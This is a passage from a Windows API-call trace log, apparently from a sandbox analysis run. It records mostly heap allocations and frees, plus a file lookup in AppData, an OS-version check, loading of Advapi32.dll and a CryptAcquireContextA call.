0x2aa9520 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0149.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0149.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0149.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.679] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Pvmhff.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3560a0, ftCreationTime.dwHighDateTime=0x1d5c97f, ftLastAccessTime.dwLowDateTime=0x5010b180, ftLastAccessTime.dwHighDateTime=0x1d5cb93, ftLastWriteTime.dwLowDateTime=0x5010b180, ftLastWriteTime.dwHighDateTime=0x1d5cb93, nFileSizeHigh=0x0, nFileSizeLow=0x15b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pvmhff.flv", cAlternateFileName="")) returned 0x9e1cf8 [0149.679] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0149.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.680] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.680] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0149.681] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.681] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0149.682] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.683] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0149.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0149.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.683] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0149.683] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.683] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.683] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.683] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.684] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be9a0) returned 1 [0149.684] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.684] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.684] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.684] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.684] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.684] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.689] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.689] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.690] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.690] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.690] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.690] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: 